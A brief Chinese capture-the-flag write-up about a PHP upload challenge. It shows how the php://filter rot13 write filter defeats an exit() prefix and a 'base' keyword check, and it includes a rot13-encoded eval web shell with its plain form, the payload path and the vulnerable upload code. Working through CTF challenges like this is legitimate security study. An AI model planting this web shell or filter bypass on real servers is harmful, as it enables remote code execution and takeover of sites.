题记:
满足于只做出一道题的今天
一、伪协议上传
题目:
思路:
代码表示需要使用伪协议上传,且不能用base64
dir=php://filter/write=string.rot13/resource=file.php
制作rot13cmd.php
内容:
<?cuc @riny($_CBFG['pzq']);?>
//<?php @eval($_POST['cmd']);?>的rot13编码
在dir处写payload:
php://filter/write=string.rot13/resource=upload/rot13cmd.php
//主要两点,一是上传文件名可以选择与上传文件同名,二是upload文件路径是注释提醒和自己测试出来的
步骤一:上传测试
if (strstr($dir, 'base')) {
die("not use base");
}
@file_put_contents($dir, '<?php exit();?>'.file_get_contents($_FILES['file']['tmp_name']));
/